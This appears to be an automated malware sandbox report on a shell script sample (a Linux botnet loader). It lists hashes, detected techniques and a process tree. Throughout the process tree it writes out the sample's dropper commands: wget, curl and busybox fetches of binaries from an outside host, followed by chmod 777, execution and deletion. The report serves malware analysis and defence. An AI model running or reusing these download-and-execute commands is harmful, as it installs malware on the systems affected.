Analysis
-
max time kernel
87s -
max time network
90s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:07
Static task
static1
Behavioral task
behavioral1
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh
-
Size
10KB
-
MD5
5ad9fce74e2c2c2bc17e1c3c7c1e9699
-
SHA1
f6a06bb0801544767f9542e687c8970f4da13169
-
SHA256
0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda
-
SHA512
70e49474c5684e1b77cc2e47abe567e6d5e8b0f7edfca79a7feefe0ae389462b6747c2841c31acb7168e04c121a563d887515cbdb75530dca80da2ade3b95d16
-
SSDEEP
192:MAM8A8b2OyaeCz0sbcqmss0xFw/3xe3rhxFw/3Vfqmsl3rD3A8b2OneCz0sT:MA0aeCz0sbcqmss0xFw/3oxFw/31qmsJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 844 chmod 984 chmod 858 chmod 865 chmod 872 chmod 907 chmod 921 chmod 942 chmod 879 chmod 886 chmod 963 chmod 717 chmod 830 chmod 935 chmod 956 chmod 977 chmod 928 chmod 823 chmod 837 chmod 893 chmod 914 chmod 724 chmod 783 chmod 900 chmod 776 chmod 851 chmod 949 chmod 970 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 718 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM 725 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI 784 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy 824 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H 831 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 838 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn 845 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 852 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 859 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 866 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 873 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 880 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 887 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj 894 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 901 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 908 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 915 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 922 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne 929 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB 936 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM 943 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 950 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn 957 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 964 MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI 971 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy 978 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H 985 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 924 wget 945 wget 780 curl 841 curl 857 busybox 896 wget 903 wget 720 wget 889 wget 955 busybox 962 busybox 983 busybox 829 busybox 862 curl 871 busybox 941 busybox 952 wget 826 wget 847 wget 890 curl 913 busybox 927 busybox 969 busybox 880 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn 899 busybox 959 wget 827 curl 861 wget 876 curl 932 curl 976 busybox 911 curl 925 curl 953 curl 775 busybox 779 wget 786 wget 902 rm 910 wget 966 wget 800 busybox 843 busybox 855 curl 875 wget 906 busybox 973 wget 974 curl 723 busybox 728 curl 840 wget 934 busybox 948 busybox 721 curl 868 wget 869 curl 967 curl 980 wget 782 busybox 791 curl 833 wget 848 curl 878 busybox 834 curl 904 curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 curl File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl File opened for modification /tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9 curl File opened for modification /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM curl File opened for modification /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H curl File opened for modification /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn curl File opened for modification /tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7 curl File opened for modification /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI curl File opened for modification /tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy curl File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn curl File opened for modification /tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn curl File opened for modification /tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl File opened for modification /tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7 curl File opened for modification /tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB curl File opened for modification /tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM curl File opened for modification /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 curl File opened for modification /tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI curl File opened for modification /tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H curl File opened for modification /tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj curl File opened for modification /tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0 curl File opened for modification /tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7 curl
Processes
-
/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh/tmp/0f4b59b0aed7e7379e1c90146e79b7b79d7991c4bd9044a9b7da750a34bf2bda.sh1⤵PID:685
-
/bin/rm/bin/rm bins.sh2⤵PID:687
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:691
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:711
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:718
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:719
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:720
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- System Network Configuration Discovery
PID:723
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:726
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:727
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- System Network Configuration Discovery
PID:775
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:778
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:779
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- System Network Configuration Discovery
PID:782
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:785
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:786
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:791
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- System Network Configuration Discovery
PID:800
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:826
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- System Network Configuration Discovery
PID:829
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:831
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:832
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- System Network Configuration Discovery
PID:833
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:836
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:850
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:853
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:854
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:857
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:861
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:864
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:878
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:880
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵PID:881
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:882
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:885
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:888
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- System Network Configuration Discovery
PID:889
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:892
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:920
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:921
-
-
